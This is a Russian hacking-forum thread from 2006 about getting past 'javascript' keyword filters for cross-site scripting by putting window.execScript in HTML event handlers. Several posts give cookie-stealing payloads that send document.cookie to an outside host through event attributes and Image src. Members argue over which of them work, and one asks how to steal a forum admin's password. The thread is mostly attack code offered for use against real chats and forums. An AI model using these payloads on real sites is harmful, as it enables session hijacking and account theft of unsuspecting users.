Авторские статьи Проводим XSS без javascript

Обсуждение в разделе «Статьи», начал(-а) Xex, 4.02.2006.

  1. Xex

    Xex Banned

    Регистрация:
    10.07.2005
    Сообщения:
    120
    Одобрения:
    41
    Репутация:
    17
    Эту писанину трудно назвать статьей, она скоре является дополнением к написанному Algol'ом по XSS.
    Думаю многим из вас приходилось встречать чаты/форумы/др. в которых присутвует уязвимость XSS, но провести ее сложно, по причине фильтрации магических слов javascript и vbscript, и модификации типа JaVasCriPt, javascript(с пробелами или табуляцией в начале),&#xx... и прочее не помогает. Так вот убедившись, что слово javascript наглухо фильтруется, есть возможность попробовать альтернативу execScript(это метод объекта window). Как написано в документации execScript - "Выполняет заданный сценарий".

    Рассмотрим на простом примере:

    Классический случай:
    Code:
    <font color=red onmouseover=javascript:alert()>алерт работает!</font>
    Используем execScript:
    Code:
    <font color=red onmouseover=window.execScript(alert())>И тут работает!</font>
    Эффект тот же=))

    Но, видимо, популярность такого метода не такая высокая как у классического по причине есго кривости...изначально в документации синтаксис execScript выглядит так:window.execScript(выражение [,язык]), но в последних версиях IE execScript не поймет даже такую строку execScript("a=1;alert(a)"). Выяснено, что он категорически не любит пробелы кавычки и ряд других необходимых символов(например для угона кукисов).
    Попробуйте:
    Code:
    <font color=red onmouseover=window.execScript(q="http://antichat.org/s/xex.gif?"+document.cookie)>не работает!</font>
    Для решения первой проблемы(невозможность использовать несколько команд одновременно(execScript(a=1;alert(a))) мы используем следующую особенность:
    Code:
    <font color=red onmouseover=window.execScript(alert());window.execScript(alert())>Два алерта!</font>
    т.е. через ; можем использовать несколько подряд идущих методов, что уже неплохо.
    А для решения второй проблемы(его нелюбовь к кавычкам и прочим символам) используем такую замечательную вещь как функции, типа alert, eval, isNaN и возможно прочие. Из этих трех мне приглянулась isNaN. Назначение этих функций для нас не важно, вся фича в том, что эти функции неким магическим способом(кому надо сам разберется) позволяют нам творить невозможное=)
    Смотрим:
    Code:
    <font color=red onmouseover=window.execScript(isNaN(q="http://antichat.org/s/we.gif?"+document.cookie));window.execScript(alert(q))>Получилось!</font> 
    Т.е. мы решили вторую проблему, таким образом мы создаем полноценную "куки-тырилку", несмотря на паранойю разработчика=))
    P.S.Возможно это уже где-то описывалось, не встречал.
    P.S.S.За всеми вопросами пишем сюда...
     
  2. lexa

    lexa Elder - Старейшина

    Регистрация:
    14.01.2005
    Сообщения:
    114
    Одобрения:
    11
    Репутация:
    0
    прикольно ! тоже самое можно сделать и на vbs


    cool
     
    #2 lexa, 4.02.2006
    В последний раз редактировалось: 4.02.2006
  3. A110ut

    A110ut Elder - Старейшина

    Регистрация:
    31.12.2005
    Сообщения:
    528
    Одобрения:
    263
    Репутация:
    63
    гыг.. ша испытаем в полевых условиях...
    --------------------------------------
    не уверен, но кажися я подоное где-то уже видел :D
     
    #3 A110ut, 4.02.2006
    В последний раз редактировалось: 4.02.2006
  4. K[o]S

    K[o]S New Member

    Регистрация:
    29.07.2005
    Сообщения:
    17
    Одобрения:
    5
    Репутация:
    4
    А нах этот гемор.
    <font color=red onmouseover=javascript:alert()>алерт работает!</font>
    Можно просто
    <font color=red onmouseover=alert()>алерт работает!</font>
    потому что события и так обрабтываются javascript`oм.
     
    Это одобряет 1 пользователь.
  5. Victor

    Victor Banned

    Регистрация:
    4.02.2006
    Сообщения:
    12
    Одобрения:
    1
    Репутация:
    0
    Автор спасибо тебе большое! Я давно так не смеялся!

    Во-первых код который ты дал для воровки кук работать не будет, будет только алерт твоего скрипта воровки кук лол.

    Дальше, научись писать ок? тогда все у тебя будет работать.

    Алерт во всех браузерах.

    HTML:
    <font color=red onmouseover=window.execScript("a=1;alert(a)")>И тут работает!</font>
    Воровка кук во всех браузерах.


    HTML:
    <font color=red onmouseover=window.execScript("img=new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;")>Получилось!</font>
    А так уже все? "Прикрыли" да?

    HTML:
    <font color=red onmouseover=a=1;alert(a)>И тут работает!</font>

    HTML:
    <font color=red onmouseover=img=new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;>Получилось!</font>

    Или ты просто написал для выкрутасывания?

    Ну можно тогда повыкрутасыватся и вот так воть,

    HTML:
    <font color=red onmouseover=img=new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;eval(img);>Получилось!</font>

    Во-общем пиши побольше статей, в разделе юмор качественных таких вот статейяк которые являются статейками продолжениями статей Алгола - мало.
     
    #5 Victor, 4.02.2006
    В последний раз редактировалось: 4.02.2006
  6. Xex

    Xex Banned

    Регистрация:
    10.07.2005
    Сообщения:
    120
    Одобрения:
    41
    Репутация:
    17
    To Victor: ошибаешься, все что ты написал, должен знать любой...я считаю это базисом и не посчитал нужным расписывать...
    P.S>процитируцй над чем ты смеялся...
     
  7. Xex

    Xex Banned

    Регистрация:
    10.07.2005
    Сообщения:
    120
    Одобрения:
    41
    Репутация:
    17
    Это условности...повторюсь, кому надо тот код сам допишет, здесь только идея...
     
  8. Victor

    Victor Banned

    Регистрация:
    4.02.2006
    Сообщения:
    12
    Одобрения:
    1
    Репутация:
    0
    Над тем как ты пишешь свои коды которые не работают лол.

    HTML:
    <font color=red onmouseover=window.execScript(isNaN(q="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie));window.execScript(alert(q))>Получилось!</font>
    Вот так допустим все что будет работать, так это алерт который будет орать

    И не болие.




    Тут Я упал.




    Имхо ну что ты мелешь....JavaScript это вообще протокол, execScript это метод переходить c одного языка на другой.


    Да не он не любит, а ты не правильно пишешь.


    HTML:
    <font color=red onmouseover=window.execScript(q="http://antichat.org/s/xex.gif?"+document.cookie)>не работает!</font>

    И почему это должно работать? О_О


    Мда, короче мда, дальше цитировать думаю не стоит.
     
  9. Xex

    Xex Banned

    Регистрация:
    10.07.2005
    Сообщения:
    120
    Одобрения:
    41
    Репутация:
    17
    Все тама работает, руки проверь...

    Рад за тебя, что ты алерт, от всегоотсального отличаешь....

    И что мне мешает использовать его нестандартно?

    Бред...Желание до*б*атся...

    To Victor:если хочется похамится пиши в пм, не засоряем...
     
    #9 Xex, 4.02.2006
    В последний раз редактировалось: 4.02.2006
  10. Victor

    Victor Banned

    Регистрация:
    4.02.2006
    Сообщения:
    12
    Одобрения:
    1
    Репутация:
    0
    Мда.....у тебя код воровки кук не может работать и не работает. Проверь для начала. Во-первых по какому принципу он будет у тебя работать? Ты у кого статью спер признавайся нука быстро....


    Мда, все что Я говорил ты просто забыл и тему сменил.

    У тебя алерт есть, но кук воровки быть не может в твоем коде.

    Как понять нестандартно? о_О

    Ответ,

    Слова выбирай и кончай курить.

    Вот Я тоже подумал когда статью твою прочел. Еще на меня смех напал.



    Короче не смеши гусей, Я написал тебе готовые коды как правильно писать надо, что ты сейчас хочешь выяснить Я не понимаю.....

    Статья = бред.

    Код воровки кук у тебя не работает и не может работать.

    Это Я сую в свою подпись.
     
    #10 Victor, 4.02.2006
    В последний раз редактировалось: 4.02.2006
  11. Xex

    Xex Banned

    Регистрация:
    10.07.2005
    Сообщения:
    120
    Одобрения:
    41
    Репутация:
    17
    Специально для неугомонного Victor:
    Вот код ворования кукисов:
    Code:
    <font color=red onmouseover=window.execScript(isNaN(q="http://antichat.org/s/xex.gif?"+document.cookie));window.execScript(isNaN(document.images[0].src=q))>Welcome!</font> 
    я думаю ты не будешь докапыватся до images[0], ибо где ты эту атаку проводить будешь, наверняка есть рисунки, ЕСЛИ НЕТ, то можно и множеством других способов сделать то же самое...
     
  12. ViK_WS

    ViK_WS New Member

    Регистрация:
    29.01.2006
    Сообщения:
    43
    Одобрения:
    0
    Репутация:
    0
    А как мона на YaBB форуме пороль админа стибзить???
     
  13. F_taker

    F_taker New Member

    Регистрация:
    18.01.2006
    Сообщения:
    20
    Одобрения:
    1
    Репутация:
    0
    А с каких это пор Javascript стал протоколом?
     
  14. Victor

    Victor Banned

    Регистрация:
    4.02.2006
    Сообщения:
    12
    Одобрения:
    1
    Репутация:
    0
    лол....
     
  15. Victor

    Victor Banned

    Регистрация:
    4.02.2006
    Сообщения:
    12
    Одобрения:
    1
    Репутация:
    0
    Xex, Я тебе уже давал рабочие примеры ты не правильно коды пишешь. :)
     
  16. Xex

    Xex Banned

    Регистрация:
    10.07.2005
    Сообщения:
    120
    Одобрения:
    41
    Репутация:
    17
    млин какой ты непонятливый...на что мне твои примеры рабочие...проверь...лично у меня все работает...а таких рабочих примеров я сам знаю как строить...
     
  17. back0rifice

    back0rifice New Member

    Регистрация:
    16.03.2006
    Сообщения:
    329
    Одобрения:
    107
    Репутация:
    14
    Угу, а "Turbo Assembler" - это беспроводная подводная лодка с вертикальным взлётом... Япацтулом :D ...
    Для справки: Java Script является интерпретируемым языком программирования, который используется для описания различных сценариев поведения браузера.
    Знаешь, Victor, может topicstarter что-то и написал неверно, но, по крайней мере, было, над чем призадуматься. Чего-то не нравится? Так объясни человеку нормально и вдумчиво, где именно он не прав, без всяких LOL'ов и выпендрёжа. Автор - X7R!
     
  18. Electro

    Electro Elder - Старейшина

    Регистрация:
    23.10.2005
    Сообщения:
    244
    Одобрения:
    45
    Репутация:
    35
    Уже лето 2006 заканчивается=)))
    Имхо он не может так обяснить потому что Victor это WJ
     
  19. back0rifice

    back0rifice New Member

    Регистрация:
    16.03.2006
    Сообщения:
    329
    Одобрения:
    107
    Репутация:
    14
    OFFTOP

    Понял, пошёл :) ...
    Да, я в курсе ;) ...
     
  20. Go0o$E

    Go0o$E Members of Antichat

    Регистрация:
    27.01.2006
    Сообщения:
    313
    Одобрения:
    226
    Репутация:
    276
    Firefox и Opera не отреагировали даже на алерт, ну а если уж IE высветил "ограничение отображения активного содержимого", то эта замена не пойдет.
     
    #20 Go0o$E, 25.08.2006
    В последний раз редактировалось: 25.08.2006
Загрузка...